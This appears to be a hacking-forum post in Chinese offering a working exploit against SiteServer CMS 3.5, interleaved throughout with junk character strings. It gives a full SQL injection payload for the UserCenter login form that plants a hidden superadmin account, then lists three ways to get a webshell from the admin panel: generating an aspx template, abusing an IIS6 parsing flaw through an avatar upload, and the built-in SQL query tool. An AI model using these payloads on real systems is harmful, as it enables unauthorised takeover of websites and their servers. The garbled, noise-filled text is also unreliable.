经测试秒杀最新的3.5版
/ B$ H! M& {. \* `/ ^( F g4 M5 f3 y& J, M- a$ F# u6 l
stieserver官网:www.siteserver.cn6 _, r$ a: ]; I; ^7 I3 d+ w5 P
1 j4 b' J& ?8 _& C
K1 r6 v% E+ u- C, P+ E4 w( n9 i+ D
7 `8 ]! t5 G- L" M
EXP:, [1 T0 {4 |6 X# V" [9 L6 c
9 L7 K3 m8 r0 m" H+ Y4 V& A! x
直接访问UserCenter/login.aspx
1 f6 M4 R& y( c+ {# C; y% i" X4 A$ T
( T/ j! E& x$ i* v c* I7 b! k
; m6 s$ T3 r; O* |/ P
用户名处输入:$ m( @. f5 L; s) t4 m
, B$ q8 z1 Y! ]+ X+ D t: X, U
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
3 ~. V. N; Z1 g' u% a' v7 B
; v) F7 a6 d$ g1 d4 S
- D x9 l8 w6 S2 v' S& x0 t# K+ ], B W
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。( q) T, ]8 ^* }/ `
5 F5 G+ N: ]) P6 m2 b6 o ( |' T6 a* `$ p" W
M1 A, D: z0 } X' T' c6 w9 Y
之后再访问后台SiteServer/login.aspx用插入的用户登陆
( L6 Q, r0 v+ [& i. K+ z \' w" C$ A3 b
% \2 i$ Y P' ~% s$ R& B6 i- V+ g" Y( i, }
后台拿webshell的三种方法:
3 H0 A% k2 k; T' Y
# {9 n5 T( G! U% C+ m" \6 d4 T一、
& M/ @5 G7 w2 V- d% y% c6 I. H0 r+ g( c" L i5 C' _
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx E# e) J, ?9 c& P
* H5 z. M. L" w
二、
) J' d( j3 C) _- W; X9 p `) z$ Y# W8 ]/ l
成员权限-》添加用户-》用户名为:1.asp
^0 o( l- r# G( z/ r: S/ M/ a2 ?4 I6 C
http://127.0.0.1/usercenter/0 v0 v. k; [5 t% o q" U
0 o( C: A- \# J( L- Q% q
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
0 h% g8 [: a1 ]9 c% W2 N! k3 v- m9 o! R
(ps:后台添加用户时不会验证是否含有非法字符)' K9 i9 i7 ], }- B3 e/ u9 B
I [1 p% O& n$ {+ t: h5 K
三、7 q$ S0 s) j+ h" @& p) T$ m4 P
2 _, }! H5 b) ]' V5 P系统工具-》实用工具-》机器参数查看
6 x! Y1 f/ V$ o- Z可以看到数据库类型、名称,WEB路径
- [' w' \5 p+ ^! Y- ~8 c6 c+ G: v" F
系统工具-》数据库工具-》SQL语句查询$ L; I4 b) r7 O! T8 H/ v
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。% R* F8 G9 P! g+ u/ B
! b4 @ g7 W4 ^# R- R- X
|